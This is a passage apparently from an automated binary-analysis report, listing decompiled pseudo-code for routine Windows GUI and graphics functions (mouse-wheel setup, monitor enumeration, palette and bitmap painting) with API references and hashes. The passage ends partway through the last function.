                                                                                • Instruction Fuzzy Hash: C781F571E00209AFCB41DBA9C985EEEB7F9AF09304F1440A6F514F7292C779AE04CB64
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E004072BC(intOrPtr* __eax, int* __edx, intOrPtr* _a4, intOrPtr* _a8) {
                                                                                				intOrPtr* _v8;
                                                                                				struct HWND__* _t19;
                                                                                				int* _t20;
                                                                                				int* _t26;
                                                                                				int* _t27;
                                                                                
                                                                                				_t26 = _t20;
                                                                                				_t27 = __edx;
                                                                                				_v8 = __eax;
                                                                                				_t19 = FindWindowA("MouseZ", "Magellan MSWHEEL");
                                                                                				 *_v8 = RegisterClipboardFormatA("MSWHEEL_ROLLMSG");
                                                                                				 *_t27 = RegisterClipboardFormatA("MSH_WHEELSUPPORT_MSG");
                                                                                				 *_t26 = RegisterClipboardFormatA("MSH_SCROLL_LINES_MSG");
                                                                                				if( *_t27 == 0 || _t19 == 0) {
                                                                                					 *_a8 = 0;
                                                                                				} else {
                                                                                					 *_a8 = SendMessageA(_t19,  *_t27, 0, 0);
                                                                                				}
                                                                                				if( *_t26 == 0 || _t19 == 0) {
                                                                                					 *_a4 = 3;
                                                                                				} else {
                                                                                					 *_a4 = SendMessageA(_t19,  *_t26, 0, 0);
                                                                                				}
                                                                                				return _t19;
                                                                                			}









                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: ClipboardFormatRegister$MessageSend$FindWindow
                                                                                • String ID: MSH_SCROLL_LINES_MSG$MSH_WHEELSUPPORT_MSG$MSWHEEL_ROLLMSG$Magellan MSWHEEL$MouseZ
                                                                                • API String ID: 1416857345-3736581797
                                                                                • Opcode ID: 2c9b3530a110b372408bf4c6c2d965b1754e1e16bcc24b4688114d6c705e0e5e
                                                                                • Instruction ID: c3ea70c89f0ea32afbae36cd1b4525e37670a6f3dc8583698f1fb75301f17434
                                                                                • Opcode Fuzzy Hash: 2c9b3530a110b372408bf4c6c2d965b1754e1e16bcc24b4688114d6c705e0e5e
                                                                                • Instruction Fuzzy Hash: 56113D70A48302AFF3109FA5C841F6AB7A8EF44350F204136BD40AB2C1D6B97D40D7AA
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 88%
                                                                                			E00426730(struct HDC__* _a4, RECT* _a8, _Unknown_base(*)()* _a12, long _a16) {
                                                                                				struct tagPOINT _v12;
                                                                                				int _v16;
                                                                                				struct tagRECT _v32;
                                                                                				struct tagRECT _v48;
                                                                                				void* __ebx;
                                                                                				void* __edi;
                                                                                				void* __esi;
                                                                                				void* __ebp;
                                                                                				void* _t60;
                                                                                				int _t61;
                                                                                				RECT* _t64;
                                                                                				struct HDC__* _t65;
                                                                                
                                                                                				_t64 = _a8;
                                                                                				_t65 = _a4;
                                                                                				if( *0x487ac3 != 0) {
                                                                                					_t61 = 0;
                                                                                					if(_a12 == 0) {
                                                                                						L14:
                                                                                						return _t61;
                                                                                					}
                                                                                					_v32.left = 0;
                                                                                					_v32.top = 0;
                                                                                					_v32.right = GetSystemMetrics(0);
                                                                                					_v32.bottom = GetSystemMetrics(1);
                                                                                					if(_t65 == 0) {
                                                                                						if(_t64 == 0 || IntersectRect( &_v32,  &_v32, _t64) != 0) {
                                                                                							L13:
                                                                                							_t61 = _a12(0x12340042, _t65,  &_v32, _a16);
                                                                                						} else {
                                                                                							_t61 = 1;
                                                                                						}
                                                                                						goto L14;
                                                                                					}
                                                                                					_v16 = GetClipBox(_t65,  &_v48);
                                                                                					if(GetDCOrgEx(_t65,  &_v12) == 0) {
                                                                                						goto L14;
                                                                                					}
                                                                                					OffsetRect( &_v32,  ~(_v12.x),  ~(_v12.y));
                                                                                					if(IntersectRect( &_v32,  &_v32,  &_v48) == 0 || _t64 != 0) {
                                                                                						if(IntersectRect( &_v32,  &_v32, _t64) != 0) {
                                                                                							goto L13;
                                                                                						}
                                                                                						if(_v16 == 1) {
                                                                                							_t61 = 1;
                                                                                						}
                                                                                						goto L14;
                                                                                					} else {
                                                                                						goto L13;
                                                                                					}
                                                                                				}
                                                                                				 *0x487ab0 = E00426184(7, _t60,  *0x487ab0, _t64, _t65);
                                                                                				_t61 = EnumDisplayMonitors(_t65, _t64, _a12, _a16);
                                                                                				goto L14;
                                                                                			}
















                                                                                APIs
                                                                                • EnumDisplayMonitors.USER32(?,?,?,?), ref: 00426769
                                                                                • GetSystemMetrics.USER32 ref: 0042678E
                                                                                • GetSystemMetrics.USER32 ref: 00426799
                                                                                • GetClipBox.GDI32(?,?), ref: 004267AB
                                                                                • GetDCOrgEx.GDI32(?,?), ref: 004267B8
                                                                                • OffsetRect.USER32(?,?,?), ref: 004267D1
                                                                                • IntersectRect.USER32 ref: 004267E2
                                                                                • IntersectRect.USER32 ref: 004267F8
                                                                                  • Part of subcall function 00426184: GetProcAddress.KERNEL32(745C0000,00000000), ref: 00426204
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: Rect$IntersectMetricsSystem$AddressClipDisplayEnumMonitorsOffsetProc
                                                                                • String ID: EnumDisplayMonitors
                                                                                • API String ID: 362875416-2491903729
                                                                                • Opcode ID: 1bceec31a97047a135f8e3041124f4b3fe8bd7a74cfebfffb60f8441dabb4c7a
                                                                                • Instruction ID: 5c2863997b3cb52ba5e54f8a7e46798dd5e683742b03c6a955819f0358736904
                                                                                • Opcode Fuzzy Hash: 1bceec31a97047a135f8e3041124f4b3fe8bd7a74cfebfffb60f8441dabb4c7a
                                                                                • Instruction Fuzzy Hash: EC3130B2E05119AFDB10DFA5E8449EFB7BCEF09304F51452BE915E2240EB38DA118BA5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 78%
                                                                                			E00423C56(intOrPtr* __eax, void* __ebx, signed int __ecx, intOrPtr __edx, void* __edi, void* __esi) {
                                                                                				intOrPtr _v8;
                                                                                				struct HPALETTE__* _v12;
                                                                                				char _v13;
                                                                                				struct tagPOINT _v21;
                                                                                				struct HDC__* _v28;
                                                                                				void* _v32;
                                                                                				struct HPALETTE__* _t74;
                                                                                				signed int _t80;
                                                                                				signed int _t81;
                                                                                				char _t82;
                                                                                				void* _t89;
                                                                                				void* _t135;
                                                                                				intOrPtr* _t165;
                                                                                				intOrPtr _t173;
                                                                                				signed int _t174;
                                                                                				intOrPtr _t177;
                                                                                				intOrPtr _t179;
                                                                                				intOrPtr _t181;
                                                                                				int* _t185;
                                                                                				intOrPtr _t187;
                                                                                				void* _t189;
                                                                                				void* _t190;
                                                                                				intOrPtr _t191;
                                                                                
                                                                                				_t166 = __ecx;
                                                                                				_t189 = _t190;
                                                                                				_t191 = _t190 + 0xffffffe4;
                                                                                				_t185 = __ecx;
                                                                                				_v8 = __edx;
                                                                                				_t165 = __eax;
                                                                                				_t187 =  *((intOrPtr*)(__eax + 0x28));
                                                                                				_t173 =  *0x423ea4; // 0xf
                                                                                				E0041FE98(_v8, __ecx, _t173);
                                                                                				E004242C8(_t165);
                                                                                				_v12 = 0;
                                                                                				_v13 = 0;
                                                                                				_t74 =  *(_t187 + 0x10);
                                                                                				if(_t74 != 0) {
                                                                                					_v12 = SelectPalette( *(_v8 + 4), _t74, 0xffffffff);
                                                                                					RealizePalette( *(_v8 + 4));
                                                                                					_v13 = 1;
                                                                                				}
                                                                                				_push(GetDeviceCaps( *(_v8 + 4), 0xc));
                                                                                				_t80 = GetDeviceCaps( *(_v8 + 4), 0xe);
                                                                                				_pop(_t174);
                                                                                				_t81 = _t174 * _t80;
                                                                                				if(_t81 > 8) {
                                                                                					L5:
                                                                                					_t82 = 0;
                                                                                				} else {
                                                                                					_t166 =  *(_t187 + 0x28) & 0x0000ffff;
                                                                                					if(_t81 < ( *(_t187 + 0x2a) & 0x0000ffff) * ( *(_t187 + 0x28) & 0x0000ffff)) {
                                                                                						_t82 = 1;
                                                                                					} else {
                                                                                						goto L5;
                                                                                					}
                                                                                				}
                                                                                				if(_t82 == 0) {
                                                                                					if(E00423FE4(_t165) == 0) {
                                                                                						SetStretchBltMode(E0041FDC4(_v8), 3);
                                                                                					}
                                                                                				} else {
                                                                                					GetBrushOrgEx( *(_v8 + 4),  &_v21);
                                                                                					SetStretchBltMode( *(_v8 + 4), 4);
                                                                                					SetBrushOrgEx( *(_v8 + 4), _v21, _v21.y,  &_v21);
                                                                                				}
                                                                                				_push(_t189);
                                                                                				_push(0x423e95);
                                                                                				_push( *[fs:eax]);
                                                                                				 *[fs:eax] = _t191;
                                                                                				if( *((intOrPtr*)( *_t165 + 0x28))() != 0) {
                                                                                					E00424268(_t165, _t166);
                                                                                				}
                                                                                				_t89 = E00423F28(_t165);
                                                                                				_t177 =  *0x423ea4; // 0xf
                                                                                				E0041FE98(_t89, _t166, _t177);
                                                                                				if( *((intOrPtr*)( *_t165 + 0x28))() == 0) {
                                                                                					StretchBlt( *(_v8 + 4),  *_t185, _t185[1], _t185[2] -  *_t185, _t185[3] - _t185[1],  *(E00423F28(_t165) + 4), 0, 0,  *(_t187 + 0x1c),  *(_t187 + 0x20),  *(_v8 + 0x20));
                                                                                					_pop(_t179);
                                                                                					 *[fs:eax] = _t179;
                                                                                					_push(E00423E9C);
                                                                                					if(_v13 != 0) {
                                                                                						return SelectPalette( *(_v8 + 4), _v12, 0xffffffff);
                                                                                					}
                                                                                					return 0;
                                                                                				} else {
                                                                                					_v32 = 0;
                                                                                					_v28 = 0;
                                                                                					_push(_t189);
                                                                                					_push(0x423e2a);
                                                                                					_push( *[fs:eax]);
                                                                                					 *[fs:eax] = _t191;
                                                                                					_v28 = E004201BC(CreateCompatibleDC(0));
                                                                                					_v32 = SelectObject(_v28,  *(_t187 + 0xc));
                                                                                					E00420360( *(_v8 + 4), _t165, _t185[1],  *_t185, _t185, _t187, 0, 0, _v28,  *(_t187 + 0x20),  *(_t187 + 0x1c), 0, 0,  *(E00423F28(_t165) + 4), _t185[3] - _t185[1], _t185[2] -  *_t185);
                                                                                					_t135 = 0;
                                                                                					_pop(_t181);
                                                                                					 *[fs:eax] = _t181;
                                                                                					_push(0x423e6f);
                                                                                					if(_v32 != 0) {
                                                                                						_t135 = SelectObject(_v28, _v32);
                                                                                					}
                                                                                					if(_v28 != 0) {
                                                                                						return DeleteDC(_v28);
                                                                                					}
                                                                                					return _t135;
                                                                                				}
                                                                                			}



























                                                                                APIs
                                                                                  • Part of subcall function 004242C8: GetDC.USER32(00000000), ref: 0042431E
                                                                                  • Part of subcall function 004242C8: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00424333
                                                                                  • Part of subcall function 004242C8: GetDeviceCaps.GDI32(00000000,0000000E), ref: 0042433D
                                                                                  • Part of subcall function 004242C8: CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,00422E1F,00000000,00422EAB), ref: 00424361
                                                                                  • Part of subcall function 004242C8: ReleaseDC.USER32 ref: 0042436C
                                                                                • SelectPalette.GDI32(?,?,000000FF), ref: 00423C9A
                                                                                • RealizePalette.GDI32(?), ref: 00423CA9
                                                                                • GetDeviceCaps.GDI32(?,0000000C), ref: 00423CBB
                                                                                • GetDeviceCaps.GDI32(?,0000000E), ref: 00423CCA
                                                                                • GetBrushOrgEx.GDI32(?,?,0000000E,00000000,?,0000000C), ref: 00423CFE
                                                                                • SetStretchBltMode.GDI32(?,00000004), ref: 00423D0C
                                                                                • SetBrushOrgEx.GDI32(?,?,?,?,?,00000004,?,?,0000000E,00000000,?,0000000C), ref: 00423D24
                                                                                • CreateCompatibleDC.GDI32(00000000), ref: 00423DA1
                                                                                • SelectObject.GDI32(?,?), ref: 00423DB6
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: CapsDevice$Palette$BrushCreateSelect$CompatibleHalftoneModeObjectRealizeReleaseStretch
                                                                                • String ID:
                                                                                • API String ID: 2358456236-0
                                                                                • Opcode ID: 12acc6d8c85570ecbd788fee79e40e5dfd11f6c11a147245e055a6f39af01ba2
                                                                                • Instruction ID: 825b2f3cc26a81e0a9d54884291c02793650457c26c19799d0130e999e4e799f
                                                                                • Opcode Fuzzy Hash: 12acc6d8c85570ecbd788fee79e40e5dfd11f6c11a147245e055a6f39af01ba2
                                                                                • Instruction Fuzzy Hash: 10514971B00215AFCB40EFA9D985E5EBBF8AB09304F51846AF508EB291D638EE44CB54
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 88%
                                                                                			E00439F44(intOrPtr* __eax, void* __edx) {
                                                                                				struct HDC__* _v8;
                                                                                				struct HBITMAP__* _v12;
                                                                                				void* _v16;
                                                                                				struct tagPAINTSTRUCT _v80;
                                                                                				int _v84;
                                                                                				void* _v96;
                                                                                				int _v104;
                                                                                				void* _v112;
                                                                                				void* __ebx;
                                                                                				void* __edi;
                                                                                				void* __esi;
                                                                                				void* __ebp;
                                                                                				void* _t38;
                                                                                				struct HDC__* _t59;
                                                                                				intOrPtr* _t88;
                                                                                				intOrPtr _t107;
                                                                                				void* _t108;
                                                                                				struct HDC__* _t110;
                                                                                				void* _t113;
                                                                                				void* _t116;
                                                                                				void* _t118;
                                                                                				intOrPtr _t119;
                                                                                
                                                                                				_t116 = _t118;
                                                                                				_t119 = _t118 + 0xffffff94;
                                                                                				_push(_t108);
                                                                                				_t113 = __edx;
                                                                                				_t88 = __eax;
                                                                                				if( *((char*)(__eax + 0x1f8)) == 0 ||  *((intOrPtr*)(__edx + 4)) != 0) {
                                                                                					if(( *(_t88 + 0x55) & 0x00000001) != 0 || E00438B9C(_t88) != 0) {
                                                                                						_t38 = E00439A64(_t88, _t88, _t113, _t108, _t113);
                                                                                					} else {
                                                                                						_t38 =  *((intOrPtr*)( *_t88 - 0x10))();
                                                                                					}
                                                                                					return _t38;
                                                                                				} else {
                                                                                					_t110 = GetDC(0);
                                                                                					 *((intOrPtr*)( *_t88 + 0x44))();
                                                                                					 *((intOrPtr*)( *_t88 + 0x44))();
                                                                                					_v12 = CreateCompatibleBitmap(_t110, _v104, _v84);
                                                                                					ReleaseDC(0, _t110);
                                                                                					_v8 = CreateCompatibleDC(0);
                                                                                					_v16 = SelectObject(_v8, _v12);
                                                                                					 *[fs:eax] = _t119;
                                                                                					_t59 = BeginPaint(E0043BD14(_t88),  &_v80);
                                                                                					E00436848(_t88, _v8, 0x14, _v8);
                                                                                					 *((intOrPtr*)(_t113 + 4)) = _v8;
                                                                                					E00439F44(_t88, _t113);
                                                                                					 *((intOrPtr*)(_t113 + 4)) = 0;
                                                                                					 *((intOrPtr*)( *_t88 + 0x44))( *[fs:eax], 0x43a096, _t116);
                                                                                					 *((intOrPtr*)( *_t88 + 0x44))();
                                                                                					BitBlt(_t59, 0, 0, _v104, _v84, _v8, 0, 0, 0xcc0020);
                                                                                					EndPaint(E0043BD14(_t88),  &_v80);
                                                                                					_pop(_t107);
                                                                                					 *[fs:eax] = _t107;
                                                                                					_push(0x43a09d);
                                                                                					SelectObject(_v8, _v16);
                                                                                					DeleteDC(_v8);
                                                                                					return DeleteObject(_v12);
                                                                                				}
                                                                                			}

                                                                                APIs
                                                                                • GetDC.USER32(00000000), ref: 00439F8F
                                                                                • CreateCompatibleBitmap.GDI32(00000000,?), ref: 00439FB3
                                                                                • ReleaseDC.USER32 ref: 00439FBE
                                                                                • CreateCompatibleDC.GDI32(00000000), ref: 00439FC5
                                                                                • SelectObject.GDI32(00000000,?), ref: 00439FD5
                                                                                • BeginPaint.USER32(00000000,?,00000000,0043A096,?,00000000,?,00000000,00000000,00000000,00000000,?), ref: 00439FF7
                                                                                • BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 0043A053
                                                                                • EndPaint.USER32(00000000,?,00000000,00000000,00000000,?,?,00000000,?,00000000,00000000,00000000,00000000,?), ref: 0043A064
                                                                                • SelectObject.GDI32(00000000,?), ref: 0043A07E
                                                                                • DeleteDC.GDI32(00000000), ref: 0043A087
                                                                                • DeleteObject.GDI32(?), ref: 0043A090
                                                                                  • Part of subcall function 00439A64: BeginPaint.USER32(00000000,?), ref: 00439A8A
                                                                                  • Part of subcall function 00439A64: EndPaint.USER32(00000000,?,00439B8B), ref: 00439B7E
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: Paint$Object$BeginCompatibleCreateDeleteSelect$BitmapRelease
                                                                                • String ID:
                                                                                • API String ID: 3867285559-0
                                                                                • Opcode ID: 6a9e0f0aa6bc594f610b22cb0e1bc7e759010655ccbd2b8d161eadcb6350d9a1
                                                                                • Instruction ID: 306c7afd92af40a217dbe2fff1c1d45e4c1a113081206cfcf9a7c14f3e5101a4
                                                                                • Opcode Fuzzy Hash: 6a9e0f0aa6bc594f610b22cb0e1bc7e759010655ccbd2b8d161eadcb6350d9a1
                                                                                • Instruction Fuzzy Hash: 5A412E71B00204AFD710EFA9CC85B9EB7F9AF4D704F10447AB91AEB291DA78AD058B54
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 83%
                                                                                			E0041F5A8(intOrPtr* __eax, intOrPtr* __ecx, int* __edx, intOrPtr _a4, int* _a8) {
                                                                                				intOrPtr* _v8;
                                                                                				intOrPtr* _v12;
                                                                                				int _v16;
                                                                                				int _v20;
                                                                                				int _v24;
                                                                                				long _v28;
                                                                                				long _v32;
                                                                                				struct HDC__* _v36;
                                                                                				intOrPtr* _v40;
                                                                                				void* _v44;
                                                                                				void* __ebx;
                                                                                				void* __edi;
                                                                                				void* __esi;
                                                                                				void* __ebp;
                                                                                				void* _t116;
                                                                                				void* _t124;
                                                                                				int* _t197;
                                                                                				intOrPtr _t205;
                                                                                				intOrPtr _t209;
                                                                                				intOrPtr _t210;
                                                                                				intOrPtr _t211;
                                                                                				int _t217;
                                                                                				int* _t219;
                                                                                				void* _t222;
                                                                                				void* _t224;
                                                                                				intOrPtr _t225;
                                                                                
                                                                                				_t199 = __ecx;
                                                                                				_t222 = _t224;
                                                                                				_t225 = _t224 + 0xffffffd8;
                                                                                				_v12 = __ecx;
                                                                                				_t219 = __edx;
                                                                                				_v8 = __eax;
                                                                                				_t197 = _a8;
                                                                                				if(_v12 != 0) {
                                                                                					E0041FA80(_v8);
                                                                                					 *[fs:eax] = _t225;
                                                                                					 *((intOrPtr*)( *_v8 + 0x10))( *[fs:eax], 0x41f84e, _t222);
                                                                                					_t205 =  *0x41f860; // 0x9
                                                                                					E0041FE98(_v8, __ecx, _t205);
                                                                                					E0041FA80(E00423F28(_v12));
                                                                                					_push(_t222);
                                                                                					_push(0x41f829);
                                                                                					_push( *[fs:eax]);
                                                                                					 *[fs:eax] = _t225;
                                                                                					_v20 = _t219[2] -  *_t219;
                                                                                					_v24 = _t219[3] - _t219[1];
                                                                                					_t217 = _t197[2] -  *_t197;
                                                                                					_v16 = _t197[3] - _t197[1];
                                                                                					if(E00424014(_v12, _t199) != _a4) {
                                                                                						_v40 = E00423960(1);
                                                                                						_t199 =  *_v40;
                                                                                						 *((intOrPtr*)( *_v40 + 8))();
                                                                                						E00424188(_v40, _a4, __eflags);
                                                                                						_t116 = E00423F28(_v40);
                                                                                						_t209 =  *0x41f864; // 0x1
                                                                                						E0041FE98(_t116,  *_v40, _t209);
                                                                                						_v36 =  *((intOrPtr*)(E00423F28(_v40) + 4));
                                                                                						__eflags = 0;
                                                                                						_v44 = 0;
                                                                                					} else {
                                                                                						_v40 = 0;
                                                                                						_v44 =  *((intOrPtr*)( *_v12 + 0x68))();
                                                                                						_v36 = CreateCompatibleDC(0);
                                                                                						_v44 = SelectObject(_v36, _v44);
                                                                                					}
                                                                                					_push(_t222);
                                                                                					_push(0x41f807);
                                                                                					_push( *[fs:eax]);
                                                                                					 *[fs:eax] = _t225;
                                                                                					_t124 = E00423F28(_v12);
                                                                                					_t210 =  *0x41f864; // 0x1
                                                                                					E0041FE98(_t124, _t199, _t210);
                                                                                					if(E0041F44C( *((intOrPtr*)(_v8 + 0x14))) != 1) {
                                                                                						StretchBlt( *(_v8 + 4),  *_t219, _t219[1], _v20, _v24,  *(E00423F28(_v12) + 4),  *_t197, _t197[1], _t217, _v16, 0xcc0020);
                                                                                						_v32 = SetTextColor( *(_v8 + 4), 0);
                                                                                						_v28 = SetBkColor( *(_v8 + 4), 0xffffff);
                                                                                						StretchBlt( *(_v8 + 4),  *_t219, _t219[1], _v20, _v24, _v36,  *_t197, _t197[1], _t217, _v16, 0xe20746);
                                                                                						SetTextColor( *(_v8 + 4), _v32);
                                                                                						SetBkColor( *(_v8 + 4), _v28);
                                                                                					} else {
                                                                                						E00420360( *(_v8 + 4), _t197, _t219[1],  *_t219, _t217, _t219, _t197[1],  *_t197, _v36, _v16, _t217, _t197[1],  *_t197,  *(E00423F28(_v12) + 4), _v24, _v20);
                                                                                					}
                                                                                					_pop(_t211);
                                                                                					 *[fs:eax] = _t211;
                                                                                					_push(E0041F80E);
                                                                                					if(_v40 == 0) {
                                                                                						__eflags = _v44;
                                                                                						if(_v44 != 0) {
                                                                                							SelectObject(_v36, _v44);
                                                                                						}
                                                                                						return DeleteDC(_v36);
                                                                                					} else {
                                                                                						return E004035B4(_v40);
                                                                                					}
                                                                                				}
                                                                                				return __eax;
                                                                                			}






























                                                                                APIs
                                                                                  • Part of subcall function 0041FA80: RtlEnterCriticalSection.KERNEL32(00487A5C,00000000,0041E21E,00000000,0041E27D), ref: 0041FA88
                                                                                  • Part of subcall function 0041FA80: RtlLeaveCriticalSection.KERNEL32(00487A5C,00487A5C,00000000,0041E21E,00000000,0041E27D), ref: 0041FA95
                                                                                  • Part of subcall function 0041FA80: RtlEnterCriticalSection.KERNEL32(00000038,00487A5C,00487A5C,00000000,0041E21E,00000000,0041E27D), ref: 0041FA9E
                                                                                • CreateCompatibleDC.GDI32(00000000), ref: 0041F64B
                                                                                • SelectObject.GDI32(?,?), ref: 0041F65B
                                                                                • StretchBlt.GDI32(?,?,?,?,?,?,?,?,00000000,?,00CC0020), ref: 0041F753
                                                                                • SetTextColor.GDI32(?,00000000), ref: 0041F761
                                                                                • SetBkColor.GDI32(?,00FFFFFF), ref: 0041F775
                                                                                • StretchBlt.GDI32(?,?,?,?,?,?,?,?,00000000,?,00E20746), ref: 0041F7A8
                                                                                • SetTextColor.GDI32(?,?), ref: 0041F7B8
                                                                                • SetBkColor.GDI32(?,?), ref: 0041F7C8
                                                                                • SelectObject.GDI32(?,00000000), ref: 0041F7F8
                                                                                • DeleteDC.GDI32(?), ref: 0041F801
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: Color$CriticalSection$EnterObjectSelectStretchText$CompatibleCreateDeleteLeave
                                                                                • String ID:
                                                                                • API String ID: 675119849-0
                                                                                • Opcode ID: 8fade14a0b8bb6aa5a3d00aa6ebabbc3893095b24b0ee73f5b28fa93de154169
                                                                                • Instruction ID: 56eeb733055bb1c0b9ac4d539382dbe7af899076f26b7cfa990cf846c4f30ea4
                                                                                • Opcode Fuzzy Hash: 8fade14a0b8bb6aa5a3d00aa6ebabbc3893095b24b0ee73f5b28fa93de154169
                                                                                • Instruction Fuzzy Hash: 3591C675A00118EFCB40EFA9D981E9EBBF8EF0D304B5544AAF508EB251C638ED45CB64
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E00439BC0(void* __eax, void* __ecx, struct HDC__* __edx) {
                                                                                				struct tagRECT _v44;
                                                                                				struct tagRECT _v60;
                                                                                				void* _v68;
                                                                                				int _v80;
                                                                                				int _t79;
                                                                                				void* _t134;
                                                                                				int _t135;
                                                                                				void* _t136;
                                                                                				void* _t159;
                                                                                				void* _t160;
                                                                                				void* _t161;
                                                                                				struct HDC__* _t162;
                                                                                				intOrPtr* _t163;
                                                                                
                                                                                				_t163 =  &(_v44.bottom);
                                                                                				_t134 = __ecx;
                                                                                				_t162 = __edx;
                                                                                				_t161 = __eax;
                                                                                				if( *((char*)(__eax + 0x1a8)) != 0 &&  *((char*)(__eax + 0x1a7)) != 0 &&  *((intOrPtr*)(__eax + 0x17c)) != 0) {
                                                                                					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x17c)))) + 0x20))();
                                                                                				}
                                                                                				_t78 =  *((intOrPtr*)(_t161 + 0x198));
                                                                                				if( *((intOrPtr*)(_t161 + 0x198)) == 0) {
                                                                                					L17:
                                                                                					_t79 =  *(_t161 + 0x19c);
                                                                                					if(_t79 == 0) {
                                                                                						L27:
                                                                                						return _t79;
                                                                                					}
                                                                                					_t79 =  *((intOrPtr*)(_t79 + 8)) - 1;
                                                                                					if(_t79 < 0) {
                                                                                						goto L27;
                                                                                					}
                                                                                					_v44.right = _t79 + 1;
                                                                                					_t159 = 0;
                                                                                					do {
                                                                                						_t79 = E00413FA4( *(_t161 + 0x19c), _t159);
                                                                                						_t135 = _t79;
                                                                                						if( *((char*)(_t135 + 0x1a5)) != 0 && ( *(_t135 + 0x50) & 0x00000010) != 0 && ( *((char*)(_t135 + 0x57)) != 0 || ( *(_t135 + 0x1c) & 0x00000010) != 0 && ( *(_t135 + 0x51) & 0x00000004) == 0)) {
                                                                                							_v44.left = CreateSolidBrush(E0041E68C(0x80000010));
                                                                                							E00412984( *((intOrPtr*)(_t135 + 0x40)) - 1,  *((intOrPtr*)(_t135 + 0x40)) +  *((intOrPtr*)(_t135 + 0x48)),  *((intOrPtr*)(_t135 + 0x44)) - 1,  &(_v44.right),  *((intOrPtr*)(_t135 + 0x44)) +  *((intOrPtr*)(_t135 + 0x4c)));
                                                                                							FrameRect(_t162,  &_v44, _v44);
                                                                                							DeleteObject(_v60.right);
                                                                                							_v60.left = CreateSolidBrush(E0041E68C(0x80000014));
                                                                                							E00412984( *((intOrPtr*)(_t135 + 0x40)),  *((intOrPtr*)(_t135 + 0x40)) +  *((intOrPtr*)(_t135 + 0x48)) + 1,  *((intOrPtr*)(_t135 + 0x44)),  &(_v60.right),  *((intOrPtr*)(_t135 + 0x44)) +  *((intOrPtr*)(_t135 + 0x4c)) + 1);
                                                                                							FrameRect(_t162,  &_v60, _v60);
                                                                                							_t79 = DeleteObject(_v68);
